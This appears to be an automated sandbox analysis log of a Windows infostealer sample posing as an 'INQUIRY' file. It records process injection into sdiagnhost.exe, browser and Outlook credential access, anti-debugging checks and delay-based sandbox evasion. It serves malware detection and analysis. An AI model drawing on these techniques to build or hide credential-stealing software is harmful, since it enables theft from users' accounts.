Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CFF172		8_2_04CFF172
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D2B2C0		8_2_04D2B2C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB12ED		8_2_04DB12ED
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D152A0		8_2_04D152A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D5739A		8_2_04D5739A
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CFD34C		8_2_04CFD34C
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC132D		8_2_04DC132D
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCFCF2		8_2_04DCFCF2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D89C32		8_2_04D89C32
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D2FDC0		8_2_04D2FDC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC1D5A		8_2_04DC1D5A
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D13D40		8_2_04D13D40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC7D73		8_2_04DC7D73
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D19EB0		8_2_04D19EB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CD3FD5		8_2_04CD3FD5
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CD3FD2		8_2_04CD3FD2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D11F92		8_2_04D11F92
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCFFB1		8_2_04DCFFB1
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCFF09		8_2_04DCFF09
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D138E0		8_2_04D138E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D7D800		8_2_04D7D800
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D19950		8_2_04D19950
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D2B950		8_2_04D2B950
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DA5910		8_2_04DA5910
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DBDAC6		8_2_04DBDAC6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D55AA0		8_2_04D55AA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DADAAC		8_2_04DADAAC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB1AA3		8_2_04DB1AA3
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCFA49		8_2_04DCFA49
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC7A46		8_2_04DC7A46
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D83A6C		8_2_04D83A6C
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D85BF0		8_2_04D85BF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D4DBF9		8_2_04D4DBF9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D2FB80		8_2_04D2FB80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCFB76		8_2_04DCFB76
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA2420		8_2_02BA2420
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BBC230		8_2_02BBC230
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9D2A0		8_2_02B9D2A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9D297		8_2_02B9D297
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9B4A0		8_2_02B9B4A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9D4C0		8_2_02B9D4C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9B5F0		8_2_02B9B5F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9B5E5		8_2_02B9B5E5
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA5AF0		8_2_02BA5AF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA3CF0		8_2_02BA3CF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA3CEC		8_2_02BA3CEC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04B6E4C3		8_2_04B6E4C3
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04B6E3A8		8_2_04B6E3A8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04B6E85E		8_2_04B6E85E
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04B6D928		8_2_04B6D928

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D8F290 appears 105 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D57E54 appears 111 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04CFB970 appears 280 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D45130 appears 58 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D7EA12 appears 86 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: String function: 019D5130 appears 56 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: String function: 019E7E54 appears 101 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: String function: 01A1F290 appears 101 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: String function: 0198B970 appears 280 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: String function: 01A0EA12 appears 76 times

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: No import functions for PE file found

Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.0000000001732000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000018E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001C31000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 02825 AISISAE 9310.exe

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@3/3

Source: C:\Windows\SysWOW64\sdiagnhost.exe

File created: C:\Users\user\AppData\Local\Temp\8m89j3K6

Jump to behavior

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sdiagnhost.exe, 00000008.00000002.2480736638.000000000313A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: INQUIRY 02825 AISISAE 9310.exe	Virustotal: Detection: 53%
Source: INQUIRY 02825 AISISAE 9310.exe	ReversingLabs: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe "C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe"
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe	Section loaded: rasadhlp.dll			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 02825 AISISAE 9310.exe, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gBSE2iEQW.exe, 00000007.00000000.1601710606.000000000030F000.00000002.00000001.01000000.00000005.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762176946.000000000030F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00066833 push esi; retf 4165h		0_2_0006676E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005D859 push es; ret		0_2_0005D85A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00052125 pushad ; iretd		0_2_00052136
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00066941 push ss; iretd		0_2_00066954
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00055223 push ebp; iretd		0_2_00055235
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00062AB9 push ebp; iretd		0_2_00062ABA
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00053430 push eax; ret		0_2_00053432
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005D4BF push ds; ret		0_2_0005D4C5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005D505 push esi; iretd		0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005D57B push esi; iretd		0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005D5E2 push esi; iretd		0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00068629 push esi; ret		0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00068691 push esi; ret		0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00068699 push esi; ret		0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0196225F pushad ; ret		0_2_019627F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019627FA pushad ; ret		0_2_019627F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019909AD push ecx; mov dword ptr [esp], ecx		0_2_019909B6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0196283D push eax; iretd		0_2_01962858
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01961368 push eax; iretd		0_2_01961369
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CD27FA pushad ; ret		8_2_04CD27F9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CD225F pushad ; ret		8_2_04CD27F9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CD283D push eax; iretd		8_2_04CD2858
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D009AD push ecx; mov dword ptr [esp], ecx		8_2_04D009B6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB0B90 push FFFFFFA0h; retn 843Ah		8_2_02BB0C6E
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA5266 push esi; ret		8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA525E push esi; ret		8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA51F6 push esi; ret		8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B9F686 push ebp; iretd		8_2_02B9F687
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BA3400 push esi; retf 4165h		8_2_02BA333B
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BAF540 push edi; iretd		8_2_02BAF610
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02B91DF0 push ebp; iretd		8_2_02B91E02

Source: INQUIRY 02825 AISISAE 9310.exe

Static PE information: section name: .text entropy: 7.994690797683423

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Code function: 0_2_019D096E rdtsc

0_2_019D096E

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Window / User API: threadDelayed 9840

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368	Thread sleep count: 133 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368	Thread sleep time: -266000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368	Thread sleep count: 9840 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368	Thread sleep time: -19680000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Code function: 8_2_02BACD40 FindFirstFileW,FindNextFileW,FindClose,

8_2_02BACD40

Source: firefox.exe, 0000000C.00000002.1985529847.000001B88B2FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: sdiagnhost.exe, 00000008.00000002.2480736638.0000000003077000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000002.2481949457.0000000001339000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Code function: 0_2_019D096E rdtsc

0_2_019D096E

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe

Code function: 0_2_000680B3 LdrLoadDll,

0_2_000680B3

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198A197 mov eax, dword ptr fs:[00000030h]		0_2_0198A197
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198A197 mov eax, dword ptr fs:[00000030h]		0_2_0198A197
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198A197 mov eax, dword ptr fs:[00000030h]		0_2_0198A197
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D0185 mov eax, dword ptr fs:[00000030h]		0_2_019D0185
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A34180 mov eax, dword ptr fs:[00000030h]		0_2_01A34180
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A34180 mov eax, dword ptr fs:[00000030h]		0_2_01A34180
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4C188 mov eax, dword ptr fs:[00000030h]		0_2_01A4C188
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4C188 mov eax, dword ptr fs:[00000030h]		0_2_01A4C188
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1019F mov eax, dword ptr fs:[00000030h]		0_2_01A1019F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1019F mov eax, dword ptr fs:[00000030h]		0_2_01A1019F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1019F mov eax, dword ptr fs:[00000030h]		0_2_01A1019F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1019F mov eax, dword ptr fs:[00000030h]		0_2_01A1019F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A661E5 mov eax, dword ptr fs:[00000030h]		0_2_01A661E5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C01F8 mov eax, dword ptr fs:[00000030h]		0_2_019C01F8
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A561C3 mov eax, dword ptr fs:[00000030h]		0_2_01A561C3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A561C3 mov eax, dword ptr fs:[00000030h]		0_2_01A561C3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]		0_2_01A0E1D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]		0_2_01A0E1D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E1D0 mov ecx, dword ptr fs:[00000030h]		0_2_01A0E1D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]		0_2_01A0E1D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]		0_2_01A0E1D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3E10E mov eax, dword ptr fs:[00000030h]		0_2_01A3E10E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3E10E mov ecx, dword ptr fs:[00000030h]		0_2_01A3E10E
